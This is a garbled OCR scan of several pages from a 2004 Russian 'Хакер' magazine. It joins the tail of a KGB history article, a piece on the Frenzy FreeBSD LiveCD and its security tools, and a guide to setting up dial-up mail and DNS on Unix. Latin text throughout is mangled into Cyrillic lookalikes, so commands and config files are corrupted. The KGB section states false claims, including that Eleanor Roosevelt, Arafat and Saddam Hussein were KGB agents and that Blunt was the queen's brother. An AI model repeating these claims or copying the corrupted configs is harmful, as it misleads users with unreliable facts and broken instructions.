Большинство агентов внедрения оседало 
в посольствах, дипломатических миссиях и 
представительствах, иностранных редакциях 
СМИ. Агенты КГБ на местах занимались, 
прежде всего, контактами с имеющимися 
агентами и вербовкой новых. Вербовали, в 
основном, мелкую сошку: секретарш, курье- 
ров, клерков. В ФРГ, к примеру, существо- 
вал целый стратегический план «наступления 
на секретарш», агенты КГБ совращали оди- 
ноких женщин, состоявших на государствен- 
ной службе и имеющих доступ к секретной 
информации. Таких шпионов-соблазнителей 
западные СМИ называли «красными Казано- 
вами». Работа казанов была более чем ус- 
пешна: за многие годы благодарные секре- 
тарши натаскали своим любопытным мужьям 
столько информации, что Комитет едва ус- 
певал их обрабатывать. 

Еще одним объектом целенаправленной 
атаки советских спецслужб были гомосексу- 
алисты. Наиболее популярный метод, рабо- 
тавший в этом случае, - шантаж. Жертву за- 
манивали, спаивали, соблазняли, фотогра- 
фировали в момент соблазнения, а потом 
выкладывали на стол компрометирующие 
фотографии и просили оказать небольшую 
услугу для Советского Союза. Играли свою 
роль и деньги - по особой статье шли завер- 
бованные КГБ агенты с денежными пробле- 
мами. Впрочем, были и доброхоты, переда- 
вавшие информацию СССР абсолютно без- 
возмездно. К таковым относились, напри- 
мер, западные и американские ученые, ра- 
ботающие в зоне ядерных исследований. 

Они считали, что, передавая СССР соответ- 
ствующие сведения, способствуют поддер- 
жанию баланса, не позволяющего начаться 
Третьей Мировой войне. Одной из таких уче- 
ных была англичанка Мелита Норвуд, в тече- 
ние сорока лет передававшая СССР секреты 
британской атомной промышленности. 

Среди агентов КГБ были такие известные 
люди, как брат британской королевы Блант, 
супруга президента США Элеонора Рузвельт, 
президенты Финляндии Кекконен и Койпис- 



то, министры обороны Франции Пьер Кот и 
Шарль Эрню, личный секретарь канцлера 
ФРГ Вилли Брандт, глава советского отдела 
контрразведки в ЦРУ Олдрич Эймс, сотруд- 
ник отдела ЦРУ по борьбе с терроризмом 
Гарольд Николсон. 

В семидесятых годах, когда интересы 
служб безопасности переместились на 
Ближний Восток, агентами КГБ успели побы- 
вать Ясир Арафат и Саддам Хуссейн. 

Л КРОХИПОДЕНИЕ 

Комитет государственной безопасности рас- 
пался вместе с Советским Союзом - госуда- 
рством, которое он призван был охранять. 
Свою миссию он объективно не выполнил - 
слишком неповоротливой, изжившей себя, 
неготовой к новым условиям оказалась ма- 
шина советской госбезопасности. Огромный, 
некогда суперфункциональный механизм 
развалился на ржавые железки: ФСБ (Феде- 
ральная служба безопасности), СВР (Служба 
внешней разведки), ГУСП (Главное управле- 
ние специальных программ президента, за- 
нятое обслуживанием и строительством 
стратегических объектов). Современные рос- 
сийские спецслужбы во многом уступают со- 
ветским. И дело тут не только в деньгах, ко- 
торых мало, не только в кадровом составе, 
который стремительно меняется, не только в 
прерванной традиции. Дело в том, что глав- 
ной задачей КГБ СССР было сохранение иде- 
ологии, которой не стало. Все, что от нее ос- 
талось, - неуклюжее и давно уже не страш- 
ное здание на Лубянке, а также пара аббре- 
виатур, которые некогда потрясли мир. ЗС 
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ще недавно загрузочная дискета была непременным атрибутом админа. Теперь на смену дискетам пришли ИѵеСО. Носить с собой 
компакт-диск, на котором находится готовая к работе система, да еще и с набором полезных утилит, стало традицией многих 
сисадминов. «Хакер» уже писал о ЫкеСО на базе Ипих и Шішіошз. О что же делать, если твоя любимая ось - РгееВЗО? 



ПОПУЛЯРНЫЙ ШЕСО-ДИСТРИБУТИВ НО ОСНОВЕ ЕВЕЕВ80 




К сожалению, похвастаться раз- 
нообразием РгееВЗБ-шных 
ШѵеСО не получится - такие 
проекты можно пересчитать 
по пальцам. Однако среди них 
есть один, заслуживающий 
твоего внимания. Несмотря 
на свой небольшой размер, 
он содержит множество полезных утилит, 
к тому же полностью русифицирован и актив- 
но развивается. Представляю твоему внима- 
нию проект, над которым я работаю уже 
больше года, - Ргешу, портативный инстру- 
мент системного администратора. За это 
время из простенького І_іѵеСО с небольшим 
набором утилит проект превратился в попу- 
лярный и качественный дистрибутив, кото- 
рым пользуются многие начинающие 
и продвинутые юниксоиды. 



А ИСТОРИЯ ПРОЕКТО 

Как и множество других проектов, все нача- 
лось с простого любопытства. Солнечным 
июльским утром 2003 года я сидел за своим 
компьютером и читал статью Мануэля Кас- 
пера «МіпіВЗО - гебисіпд РгееВЗО», в кото- 
рой автор рассказывал, как ему удалось 
уместить полностью работоспособную 
РгееВЗО всего лишь в 22 Мб. Мне стало ин- 



тересно, можно ли загрузить такую урезан- 
ную систему с компакт-диска, и я начал экс- 
периментировать. 

Разработка Ргешу была весьма непрос- 
тым занятием. Я облазил множество сай- 



тов, выискивая по крупицам полезную ин- 
формацию. Было проделано множество 
экспериментов с опциями ядра, методами 
загрузки, настройками софта... Первый 
релиз Ргепгу вышел в августе прошлого 




106 




3_в 





карманный чертенок по имени менту 



Залогиниться в систему можно 
под пользователем тооі без пароля. 

1 



года. Неожиданно для меня новый проект 
заинтересовал многих, пришла куча раз- 
ных отзывов. Поэтому через два месяца 
вышла версия 0.2, в которой были вычи- 
щены баги первой версии и добавлено 
множество новых фишек. 

Однако у первых версий был весьма 
серьезный недостаток - проги грузились 
куда тормознее, чем с линуксовых ШѵеСО. 
Причина - отсутствие в РгееВЗО модуля 
сжатой файловой системы. Практически 
все линуксовые ШѵеСО используют сжатые 
файловые системы (сіоор, зциазМз, 
сгатТз и т.п.), благодаря чему на диске 
размещается намного больше приложе- 
ний, а скорость их запуска в несколько 
раз выше, чем была в Ргешу. Разработка 
новой версии затянулась. Найдя несколь- 
ко проектов по созданию сжатых файло- 
вых систем для РгееВЗО, я попытался 
применить их наработки в Ргешу, но 
тщетно - единственным результатом ра- 
боты всех этих модулей было множество 
сообщений об ошибках :). 

К счастью, Максим Хон, один из участни- 
ков проекта РгееВЗО, заинтересовался этой 
проблемой и портировал модуль сіоор 
(сжатая файловая система, используемая в 
Кпорріх) в РгееВЗО 5. Результат превзошел 
все ожидания - проги стали загружаться так 
же быстро, как и с линуксовых ШѵеСО, а по 
сравнению с предыдущими релизами 
Ргешу скорость выросла в три раза. Кстати, 
модуль деот идг теперь входит в дерево 
сорцов РгееВЗО. 

27 июля вышел долгожданный релиз 
Ргепгу 0.3. Теперь, в отличие от предыду- 
щих версий, базовой системой стала 
РгееВЗО 5.2.1. Размер исошника Ргепгу 
0.3 составляет 198 Мб, его можно запи- 
сать на 3-дюймовый компакт-диск и но- 
сить с собой в кармане. Однако не обма- 
нывайся размером - на компакте разме- 
щено около 400 программ общим объе- 
мом порядка 600 Мб, благодаря сжатию 
файловой системы. 

Ты всегда можешь пообщаться с пользо- 
вателями Ргешу на форуме сайта и в дискус- 
сионном списке рассылки. Ведь проект не 
стоит на месте, идет работа над новыми 
версиями, и стоит быть в курсе всех собы- 
тий, чтобы первым успеть увидеть скриншо- 
ты и достать новый релиз :). 



Л ЧТО МОЖЕТ ШШ 

Итак, ты достал диск с Ргепгу или прожег 
исошник самостоятельно. Вставляем диск в 
СО-ВОМ, перезагружаемся. Уже через пол- 
торы минуты система загружена, и мы попа- 
даем в самую обыкновенную текстовую кон- 
соль РгееВЗО. Залогиниться в систему мож- 
но под пользователем гооі без пароля. Наб- 
рав команду Меір (о чем нам напоминают 
после входа в систему), можно прочесть до- 
кументацию по системе: какие проги входят 
в состав дистрибутива, как настроить сеть, 
как сохранить и восстановить настройки и 
так далее. В общем, разбираться в системе 
методом научного тыка тебе не придется - 
все тап-страницы и документация к прог- 
раммам на месте, а также есть РгееВЗО 
НапбЬоок и РгееВЗО РАО на русском языке. 

В качестве шелла используется Ісзіі, к ко- 
торому прикручены конфиги от проекта 
Ісзіігс (Іс$Іігс.$М). Теперь в нем присутствует 
расширенное автодополнение команд, рабо- 
тают «горячие» клавиши. Конечно, есть и 
традиционные файловые менеджеры вроде 
МібпідМ Соттапсіег или Оетоз Соттапсіег. 
Ладно, скажешь ты, консоль - это хорошо, а 
что же насчет графического интерфейса? Нет 
проблем, набирай команду зШх. Система 
сама определяет модель видеокарточки и 
монитора, и после небольшой паузы запуска- 
ется ХРгее86 4.3.99 с оконным менеджером 
ТІихЬох 0.9.9. Как видно на скриншотах, все 
это выглядит весьма стильно. 

Описание всех программ из Ргешу 0.3 
займет довольно много места, поэтому 
вкратце пройдемся по основным категори- 
ям софта. 

Для работы с файлами и дисками в 
системе имеются файловые менеджеры 
Оесо, МС и ХІМС, комплект утилит для ра- 
боты с ООЗ-дискетами тіооіз (а это зна- 
чит, что можно и не монтировать диске- 
ты), всевозможные архиваторы. Разработ- 
чиков софта порадует тот факт, что на 
диске есть дсс, пазт, регі и руШоп, так 
что можно без проблем скомпилировать 
свою прогу или запустить скрипт. Сисад- 
мины найдут на диске утилиты восстанов- 
ления файлов, программы для работы с 
жестким диском, бенчмарки и тесты, ан- 
тивирусы сіатаѵ и йг.ѴѴеЬ с возмож- 
ностью обновления антивирусных баз. 



ГКЕИ2ѴХ0КЕР Е0ІТІ0И 



С пециально для журнала я подготовил нестандартную версию 
Ргепгу. Исошник на компакт-диске журнала содержит допол- 
нительно несколько юниксовых утилит для анализа безопаснос- 
ти от различных хакерских групп и доки по техникам работы с 
ними, а также образ дискеты для загрузки на компьютерах, 
ВІ05 которых не поддерживает загрузку с СО. 




Софт для работы с сетями составляет зна- 
чительную часть дистрибутива. Можно не нап- 
рягаясь настроить локалку с помощью скрипта 
Іап-сопТід, для модемного соединения есть 
ррр-сопТід и звонилки ХІЗР и СІіезШ-сІіаІег. 
Кроме стандартных сетевых компонентов, 
имеются ѴРИ и ѴѴігеІезз-угилиты. Для серфин- 
га инета найдутся браузеры Іупх, Ііпкз-МаскесІ, 
Орега, качалка ще\, почтовики гшй и 
зуІрМеесІ-сІаѵѵз, разный софт для общения в 
ІСО, ІРС и ЗаЬЬег. Админу пригодятся тулзы 
для расчета сетей, мониторинга трафика, ути- 
литы для работы с протоколами ЭИЗ, ШАР, 
ЗІММР, ОНСР, ІСМР, АНР, а также софт для 
удаленного управления (РиТТѴ, гсіезкіор, N/N0) 
и клиенты МуЗОЬ и РозІдгеЗОІ_. А для хакера 
самыми интересными будут прокси и реди- 
рекгы, сканеры портов, сервисов и сетей 
(птар, конечно же, присутствует), сканеры 
безопасности (включая Меззиз), снифферы 
(сізпіЯ, ейегсар, ейіегеаі и другие) и множест- 
во других зесигііу-угилит. 

Но и это еще не все. На диске присут- 
ствует даже офисный софт - просмотрщики 
форматов ЦОС, ЭіѴи, СНМ, РОР и текстовый 
процессор АЬіѴѴогсІ. А еще можно смотреть 
картинки, слушать музыку и смотреть видео 
- софт для этого тоже есть. 

Как видишь, система содержит практичес- 
ки все ПО, которое только может тебе при- 
годиться в работе. Причем основную его 
часть составляют проги из разделов пеі, пеі- 
тдгтгі, зесигііу и зузіЛіІз фришного дерева 
портов. Полный список прог из Ргепгу 0.3 
можно найти здесь: 
Мф:/Дгеп2у.огд.иа/ги$/с1ос/ѵОЗ/$о(іѵѵаге.$ІіІпІ. 




л На Хакер- йѴй ты 
найдешь исошник 
Ргепгу 0.3 Хакер 
есІШоп. 
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а ѵтоѵѵ.ѵѵіЛЬзсІ.огд 
а тОпО.сН 




а Поддержка АСРІ 
в РгееВЗЭ 5, к со- 
жалению, пока что 
до конца не отла- 
жена. Поэтому ес- 
ли при запуске 
Ргепху система не- 
ожиданно зависает 
при загрузке ядра 
или некорректно 
работает, попро- 
буй загрузить 
Ргепгу без подде- 
ржки АСРІ. Для 
этого в загрузоч- 
ном меню выбери 
пункт 2 (Вооі 
Ргепгу ѵѵіііі АСРІ 
сІізаЫесІ). 



Использование ШѵеСО дает тебе потрясаю- 
щую мобильность - практически на любом 
компьютере, загрузившись с компакта, ты мо- 
жешь работать с полным набором приложе- 
ний, не устанавливая ничего на жесткий диск. 
Все настройки, сделанные тобой во время ра- 
боты, можно сохранить на дискету, 118В- 
флешку или раздел жесткого диска с помощью 
скрипта Ьаскир - при следующей загрузке они 
будут восстановлены автоматически. 

Как видишь, «карманный чертенок» спосо- 
бен на многое. Фактически это полноценная 
РгееВЗО, которую можно носить с собой в 
кармане рубашки и которая всегда готова к 
работе. А уж для чего ты будешь ее исполь- 
зовать - дело твое. Хочешь - тестируй желе- 
зо и восстанавливай файлы с винта, хочешь 
- сканируй сетку и тестируй серваки на на- 
личие дыр в безопасности, хочешь - серфи 
инет, общайся по аське, слушай музыку или 
смотри фильмы. 

^ какрпБотпЕтгііЕнгѵ 

В основе системы лежит самая обыкновен- 
ная РгееВЗО 5.2.1-ВЕІ.ЕАЗЕ. Правда, для 
ШѵеСО ее пришлось облегчить, написав 
собственный таке.сопР 

В качестве корневой файловой системы 
используется полуторамегабайтный образ, 
на котором находится іпіі и несколько необ- 
ходимых утилит. При загрузке ядро подгру- 
жает этот образ и монтирует корневую фай- 
ловую систему с него, после чего стартует 
іпіі. Он запускает собственный гс-скрипт, в 
котором производится поиск компакт-диска 
с Ргепгу. Как только он будет найден, выпол- 
няется скрипт Тгепгугс из корня компакта. 
Этот скрипт монтирует образы сжатых фай- 
ловых систем, создает файловые системы в 
оперативной памяти и заполняет их файла- 




ПНППОГИЧНЫЕ ПРОЕКТЫ 



К онечно, Ргепгу не единственный в мире проект по созданию 
ШіѵеСО на основе ОС РгееВЗО. Одним из самых известных 
таких проектов является РгееЗВІЕ. Его разработкой занимается 
итальянская группа пользователей РгееВЗО (ОІІРІ). Задачей 
проекта является написание набора скриптов для создания 
ЫѵеСО и различных дистрибутивов на его основе. Ріа данный 
момент ими выпущен РгееЗВІЕ 1 .0. 

Также есть ЗпагІ, предназначенный для проверки безопаснос- 
ти. Последняя версия 0.0.3 вышла около года назад, подробной 
информации о дистрибутиве нет. Вообще проект производит 
впечатление заброшенного. 

ВЗОеѵіапІ является ЫѵеСО-дистрибутивом объемом 210 Мб и 
содержит небольшой набор программного обеспечения. Одна- 
ко из-за отсутствия сжатия он работает весьма медленно. 



ми, после чего накладывает на эти файлы 
(по необходимости) заранее подготовленные 
патчи. После всех этих приготовлений запус- 
кается системный гс. 

Для корректной работы ШѵеСО понадоби- 
лось добавить новые гс-скрипты (монтирова- 
ние диска, восстановление бэкапа, инфор- 
мация о железе, поиск мыши) и модифици- 
ровать некоторые из стандартных. 

Уместить на 200-мегабайтный компакт- 
диск такое количество приложений тоже бы- 
ло весьма непросто. Помимо сжатия файло- 
вой системы, пакеты после установки были 
почищены от ненужных библиотек, файлов, 
локалей - это дало дополнительную эконо- 
мию места на 1 00 Мб. Для некоторых прог 
пришлось писать специальные патчи. Напри- 
мер, для хсбт сделан скрипт, позволяющий 
читать СНМ-файлы в виндовой кодировке, а 
для пеззиз создано несколько симл инков, 
чтобы записываемые им данные хранились в 
разделе оперативной памяти. 

^ ГВЕИ2Ѵ ВЕН08ТЕВШ6 Н01ѴТ0 

Естественно, Ргепгу можно переделать под 
свои нужды, а при наличии некоторого опы- 
та вполне возможно собрать собственный 
дистрибутив на базе Ргепіу. Тебе достаточно 
только заменить некоторые конфиги, все 
очень просто. Для начала нужно разобрать 
исошник. Загружайся в РгееВЗО и копируй 
все содержимое исошника на винт в папку 
РВЕІМ2Ѵ. Готовишь нужные патчи (в качестве 
примера размещения файлов возьми 
Іапд еп.Ші из папки сопріез), упаковыва- 
ешь их в архив командой 

# іаг суѵЕ кепгуОЗсопШі 

и переносишь полученный архив в папку 
РВЕ1\12У/сопр1е5. Потом делаешь исошник 
командой: 

# шкі$оТ$ -Ь Ьооі/сйЬооі -по-етиГЬооі -с Ьооі/Ьооі.саіаІод -г 

\] -О -V Ггеп 2 у_гета$іеге(І -о Ігеп2у_гета$іеге(1.і$о РКЕМѴ 

- И ДИСК ГОТОВ. 

Если же ты хочешь самостоятельно соб- 
рать свою версию Ргешу, то к твоим услугам 
сборочные скрипты. Их можно скачать на 
сайте или взять в папке беѵеі компакт-диска. 

Для сборки тебе потребуются установлен- 
ные исходные тексты системы и порты зузи- 



іііз/плкізо^з и зузийіз/сіоор-ийіз, а для работы 
скрипта монтирования дисков, определения 
железа и других утилит из состава Ргешу в 
состав будущего диска нужно включить па- 
каджи Іапд/регІ5, зузіЛіІз/ІіпихМізк, беѵеі/ссіі- 
аіод, хі 1/хсІіаІод, зуз и1:і I з/х86 і пТо , 
зузийіз/бтісіесосіе, зузийіз/рсіийіз. Если все 
готово, приступаем. 

Распаковываешь сборочные скрипты на 
диск, потом копируешь все нужные пакаджи 
в каталог Раскадез/РгееВЗО (при установке 
зависимости не будут проверяться, так что 
проследи за этим самостоятельно). Если 
нужно, поменяй дефолтные конфиги в папке 
Тгепгуркд. 

Если ты сделал все необходимое, оста- 
лось запустить по очереди сборочные скрип- 
ты, начиная с 01 .Ьазе.зіі и заканчивая 
1 2.ткізо.зГі. В результате всех этих 
действий в каталоге ІЗО будет лежать исош- 
ник собранного тобой дистрибутива. 

Л ПОДВЕДЕМ ИТОГИ 

В одной из песен Штр Вігкіі звучат слова: 
«Если хочешь, чтобы что-то было сделано 
правильно, - просто сделай это сам». Я тоже 
не стал дожидаться, пока кто-то сделает 
нужный мне дистрибутив, и сделал удобный 
и надежный ШѵеСО на основе РгееВЗО. Нес- 
мотря на то, что я считал эту затею безум- 
ной идеей (отсюда и название Ргепгу), ре- 
зультат превзошел все ожидания. В настоя- 
щий момент Ргешу является единственным 
русскоязычным ШѵеСО на основе ОС 
РгееВЗО, и каждый может найти в нем что- 
то полезное и интересное для себя. Новички 
могут начать знакомство с РгееВЗО именно с 
этого дистрибутива, продвинутые пользова- 
тели найдут в нем множество полезных 
программ, а сисадмины и хакеры будут в 
восторге от хардварных, сетевых и зесигііу- 
утилит. Дело не в инструменте, а в том, кто 
и для чего его использует. 

Я уверен, что Ргешу займет достойное 
место в твоем софтовом инструментарии. 
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сожалению, в настоящее время большинству из нас приходится довольствоваться тоскливым диалапом. Медленное соединение, 
неудобная повременная оплата, постоянные обрывы связи создают немало проблем. Но не стоит отчаиваться, эта статья и *піх 
помогут тебе улучшить ситуацию. 



ВЫХОЛИМ В СЕТЬ 



А позвони мне, позвони.. 



[Оіаіег Оеіаиііз] 



$ ѵѵѵсііаі рііопе2 




С начала я хотел рассказать 
про создание собственных 
скриптов для дозвона. Но что- 
бы объяснить все подробнос- 
ти работы рррб и сЫ, потре- 
бовалась бы целая статья. Мы 
поступим проще - воспользу- 
емся звонилкой ѵѵѵсііаі. С ее 
помощью процесс настройки соединения 
займет не более 5 минут. Беги на сайт раз- 
работчиков и качай последнюю версию 
вместе с библиотекой ѵѵѵзігеатз. Собирай 
сначала библиотеку, затем сам ѵѵѵсііаі. Уста- 
новка стандартна, поэтому здесь не останав- 
ливаемся (самые ленивые могут взять би- 
нарный пакет, благо он есть в любом дист- 
рибутиве). Конфигурировать ѵѵѵсііаі одно удо- 
вольствие - все автоматизировано по полной 
программе. Для начала создадим начальную 
конфигурацию: 



й ѵшІіаІсопШс/ѵтІіаІ.сопТ 



ѵѵѵсІіаІсопТ сам найдет модем, проверит 
максимальную скорость порта, подберет все 
необходимые параметры и запишет резуль- 
таты в /еіс/ѵѵѵсІіаІ.сопТ. Вот примерное со- 
держимое этого файла: 



# Порт модема 
МосІет = Меѵ/ііу$0 

# Максимальная скорость порта 
ВаисІ = 115200 

# Инициализация модема 
Ілііі = АТ2 

ІПІІ2 = АЮО VI Е1 30=0 &С1 И2+Г(Ш=0 

# Устанавливаем импульсный набор номера (для тонового 
АЮТ) 

ОіаІ Сопппапб = АТОР 

# Номер телефона 
РИоле = 12345 

# Логин 

ІІзеглате = пате 

# Пароль 
Ра$$ѵѵогсІ = зесгеі 

# Второй провайдер (опционально) 

[Оіаіег р!іопе2] 

РІіопе = 54321 
ІІзегпате = пате2 
Ра$$ѵѵогсІ = $есге!2 

Номеров телефонов может быть несколь- 
ко. По второму телефону из нашего конфига 
можно позвонить командой 



Не забудь поставить на ѵѵѵсііаі зиісі-бит 
или воспользуйся зисіо. 

А КЭШИРУЕМ ПОНППЕНЬКУ 

Когда сидишь на диалапе, значительное вре- 
мя затрачивается только на резолвинг. Поче- 
му бы тогда не запоминать адреса часто посе- 
щаемых серверов, чтобы не гонять лишний 
трафик и не тратить драгоценное время? Вот 
этим и занимается кэширующий ОИВ-сервер 
рсіпзсі. После установки в /изг/іосаі/еіс появит- 




по 







диопоп под крылом пингвина 



ся конфигурационный файл рсіпзсі.сопізат- 
ріе, а в каталоге /ѵаг/сасМе/рсІ пзсі - файл 
рсІпзсІ.сасМе, в котором и будут находиться 
сканированные адреса. Переименуй 
рсІпзсІ.сопТ.затрІе в рсІпзсІ.сопТ и открой его 
редактором. Нас интересуют только первые 
две секции: дІоЬаІ и зегѵег. 

дІоЬаІ { 

41 Максимальный размер кэша в Кб 
регт_сасЬе=2048; 

# Каталог для хранения кэша 
сасЬе_біг="/ѵаг/сас4іе/рбпзб"; 

# Максимальное время хранения записи в се- 
кундах 

шахШ=604800; 

# От имени какого пользователя запускать сер- 
вер 

гип_а$="поЬос1у"; 

# Стартовать в режиме демона 
баетоп=оп 

# Порт и адрес, на которых будет висеть сервер 
$егѵег_рогІ=53; 

зегѵепр-'Ш.О.Г; 

} 

зегѵег { 

# ІР-адрес ОИЗ-сервера (укажи здесь твоего 

прова) 

ір="192.168.0.1"; 

# Таймаут между ОИЗ-запросами к этому серве- 

ру 

іітеоиі=30; 

# Не проверять доступность сервера 
иріезі=попе; 

# Предположить, что сервер доступен 
ргезеі=оп 

} 



Остальные записи в этом файле можно 
оставить без изменений. После окончания 
настройки сделаем так, чтобы все ОИЗ-зап- 
росы направлялись на наш кэширующий 
рбпзсі: 

# есііо "патезегѵег 127.0.0.1" > /еіс/гезоіѵ.сопі 

А ЗОВЕДИ ПОЧТОВОГО РОБОЮ 

Для получения почты с удаленного сервера 
будем использовать очень мощную и удоб- 
ную программу ТеІсМтаіІ. Единственное ее 
предназначение - подключаться к почтовому 
серверу по протоколу РОРЗ или ІМАР и за- 
бирать почту. В нашем случае ТеІсМтаіІ бу- 
дет передавать почту ргостаіГу. Для наст- 
ройки ТеІсИтаіГа в интерактивном режиме 
предназначен ТеісМтаіІсопТ. Настоящим 
юниксоидам и тем, у кого не установлены 
руіііоп и ісІДк, такой способ не подходит, 
поэтому сделаем все ручками. Предполо- 
жим, что ты держишь ящик на паіі.ги, тогда 
конфиг будет выглядеть примерно так: 

# Пишем логи 

зеі Іодіііе -/Іодз/ІеісЬтаіІ.Іод 

# Работа в режиме демона, забираем понту каждые 5 минут 

зеі сіаетоп 300 

# Адрес почтового сервера и используемый протокол 

роІІ рор.таіі.ги ргоіо рорЗ 

# Имя пользователя и пароль 
и$ег "пате" ѵѵііЬ ра$$ "зесгеі" 

# Передаем полученную почту ргостаіГу 
тба "/изг/Ьіп/ргостаіІ -б %Т" 

# Забирать всю почту с сервера 
іеісЬаІІ 



Далее выставляем корректные права дос- 
тупа к нашему конфигу: 

$ сЬтоб 600 -/.іеісЬтаіІгс 

Чтобы не выполнять команду Теісіітаіі са- 
мостоятельно при каждой загрузке, следует 
прописать ее в один из стартовых скриптов 
твоей системы, например /еіс/гс.іосаі. 
РеісІітаіІ может работать с несколькими 
серверами, последовательно забирая почту 
с каждого из них. 

А ФИЛЬТРУЙ Б030Р! 

Как я уже говорил, ТеІсМтаіІ будет переда- 
вать полученную почту ргостаіГу- РгостаіІ, в 
свою очередь, раскидает сообщения по раз- 
ным ящикам в зависимости от некоторого 
условия. Для отлова спама воспользуемся 
мощным спам-фильтром зратаззаззіп, благо 
прикрутить его к ргостаіІ достаточно легко. 
Все необходимые пакеты есть в любом дист- 
рибутиве. На случай, если ты любитель со- 
бирать все из исходников, сообщу, что зра- 
таззаззіп написан на регГе и собирать его 
следует так: 

14 регі МакеІіІе.П 
44 таке 
44 таке іпзіаІІ 

Сразу после установки занеси все имею- 
щиеся у тебя письма в белый лист (так зра- 
таззаззіп будет меньше ошибаться): 

$ саі ~/МаіІ/* > за-Іеагп — Иат 

Как только все пакеты будут собраны и 
установлены, создавай -/. ргостаіІ гс и заноси 
в него свои правила. Чтобы ты не запутался, 
вот пример: 

44 Каталог для почтовых ящиков 
МАІШІННОМЕ/Маіі 

44 Дефолтный ящик. Сюда будет складываться почта, не по- 
падающая под правила 
0ЕГАШ=$МШІК/іпЬох 
44 Включим логирование 
ШбЕШНОМЕ/Іодз/ргостаіІ.Іод 
44 Путь до ІогтаіІ, используется для изменения почтовых за- 
головков 

Р0РМАИ=/и$г/ЬіпЛогтаіІ 
444444 Прим. ред. 

44 Во избежание потери важных писем в течение тестирова- 
ния правил фильтрации процмейла настоятельно рекомен- 
дую дублировать всю входящую почту в ~/Маіі/Ьаскир): 

:0 с 
Ьаскир 

444444 Удаляем повторяющиеся письма 
:0 Міс: .тздіб.Іоск 
ІЗРОРМАИ-О 8192 .тздіб.сасЬе 

:0 а 

/беѵ/пиІІ 

444444 Фильтруем спам 

44 Проверять письма только < 250Кб 

:0іѵѵ 

* < 256000 
| зратаззаззіп 

44 Складывать спам в ящик зрат 

: 0 : 




* л Х-$рат-$іаіиз: Тез 
зрат 




144444 Далее идут правила раскидывания почты по ящикам 
44 Письма из рассылок в ящики Ііпих и Ьзб 
:0 

* Л І.і5І-Іб:.*сотр.50Іі.Ііпих 
Ііпих 

:0 

* л изНб:*сотр.5о44.Ьзб 
Ьзб 

44 Почта с заголовками Ыпих, ІЩ ІЩ *піх отправляется в 
ящикІШ 
:0 

* Л ЗиЬіесі:.*(Еіпих|ІІМІХ|В50|*піх) 

ІШ 



а ореп.піі.са/ѵѵѵсіі- 

аі/ 

аѵіші. рПуз.іш. 

пІ/-готЬоиІ$/рсІп8СІ 

.МтІ 

іт. саІЬ.огд/ 
-езг/ІеІсНтаіІ 
лтт. ргостаіІ. огд 
зратаззаззіп. арас 
Ііе.огд 

л шл/ѵ.розШх.огд 
л ѵ/ѵѵѵѵ.тиН.огд 
Ашт. раиідга- 
Иат.сот/зрат.ІіітІ 
а таіІегз.Ьу.ги 
ипіх.зіаі.ЬигпеІ.ги/ 
ргостаіІ/ргостаіІ.И 
іті 



44 Письма от друзей идут в ящик Ігіепбз 
:0 

* л Ргот:.*(реіуа@таіІ.ги|тазЬа@уапбех.ги) 

Ігіепбз 

А СОН СЕБЕ ПОЧТОПЬОН 

Предлагаю установить собственный почтовый 
сервер. Достоинство использования личного 
сервака состоит в том, что почту ты сможешь 
отправлять в любое время, независимо от то- 
го, подключен ты к Сети или нет. Пока ты на- 
ходишься в оффлайне, вся полученная коррес- 
понденция будет помещаться в очередь. Как 
только ты выйдешь в Сеть, мыльный сервачок 
автоматически доставит почту адресатам. Так- 
же сервер требуется тем МІІА (почтовым поль- 
зовательским агентам, например гшй), кото- 
рые не умеют самостоятельно отправлять поч- 
ту (великий «ІІпіх ѵѵау» ;). В качестве сервера 
будем использовать розйіх, он довольно прос- 
то настраивается и удовлетворяет всем нашим 
требованиям. Сливай его с официального сай- 
та, распаковывай и устанавливай: 



44 таке іібу 
44 таке 
44 таке іпзіаІІ 



После запуска последней команды выва- 
лится несколько вопросов типа «Куда кидать 
файлы настроек, документацию и т.д.?». В 
ответ можешь смело жать <Епіег>. После 
окончания установки в каталоге /еіс/розйіх 
осядет конфигурационный файл таіп.с7. 
Конфиг хорошо прокомментирован, и разоб- 
раться в нем не составит труда. Для уверен- 
ности вот тебе рабочий пример: 



44 Имя нашего хоста и домена 
туЬозіпате = ІосаІЬозі.ІосаІботаіп 
туботаіп = Іосаіботаіп 
14 Адреса прослушиваемых интерфейсов 



іи 



нжиксоип 



ХПКЕР/№1 01701/2004 





іпеШегіасез = ІосаІІіові 

# Домены сервера. Почта, пришедшая на адреса этих доме- 
нов, будет доставляться локально 

тубезііпаііоп = ЗтуІіозіпате, ІосаІІюзі.Зтуботаіп, $тусІо- 
таіл 

# С адресов каких сетей принимать почту 
тупеіиюгкз = 127.0.0.0/8 

# Какому серверу передавать почту. Пропиши здесь адрес 
зтір-сервера своего прова 

геіауііозі = зтір.ргоѵібег.ги 

# Файл почтовых псевдонимов 
аІіа$_тар$ = ІіазШс/розІйх/аІіазез 
аІіа$_баіаЬа$е = ІіазШс/розіііх/аІіазез 

# Какой программе отдавать локальную почту 
таіІЬох_соттап(1 = /изг/Ьіп/ргостаіІ 

# Не пытаться отправлять почту самостоятельно 
беіег.ігапзрогіз = зтір 

# Баннер 

зтірсЦзаппег = Зирег зтір зегѵег (6.6.6) оп ЗтуІіозіпате 



СДЕПОЙ ИЗ ОІПМІР ВЫДЕПЕНК9 

Н екоторых прикалывает делать из сііаі-ир выделенку, когда 
по запросу к любому удаленному серверу (например пере- 
ход по ссылке в браузере) происходит автоматический доз- 
вон до прова, а после нескольких минут бездействия - отклю- 
чение. Такое можно организовать при помощи программки 
сііаісі или штатными средствами рррсі. 



Если есть ошибки - исправляй, если нет - 
можешь поднимать сервер: 

# розіііх зіагі 

Для просмотра содержимого почтовой 
очереди воспользуйся командой так}. 

А ЗПМІІТТИ ПОЧТОВИК 

Если спросить *піх-гуру, каким почтовиком 
он пользуется, то в большинстве случаев от- 
вет будет либо «Сіпиз», либо «Мий». Т.к. 
дпиз является частью етасз, то его рассмат- 
ривать мы не будем (рассмотрим его как-ни- 
будь в другой раз - в статье про редакторы 
;), а вот на тий остановимся поподробнее. 
Качай его исходники (устанавливай грт), 
создавай файл -/-тиНгс (прокомментирован- 
ный пример лежит в /еІс/тий/Мийгс) и пиши 
в него следующее: 



И Помещать отложенные сообщения в этот ящик 
зеі розіропеб- -розіропеіі" 

# Сохранять исходящую почту в этот ящик 
зеі гесогб="=$епі" 

# Кодировка, используемая для исходящей почты 
зеі зепб_сІіаг$еі="коі8-г" 

# Дефолтный почтовый ящик 
зеі зрооііііе- ЧпЬох" 

Для более удобной работы с некоторыми 
типами файлов из тий немного подправим 
/еіс/таіісар: 

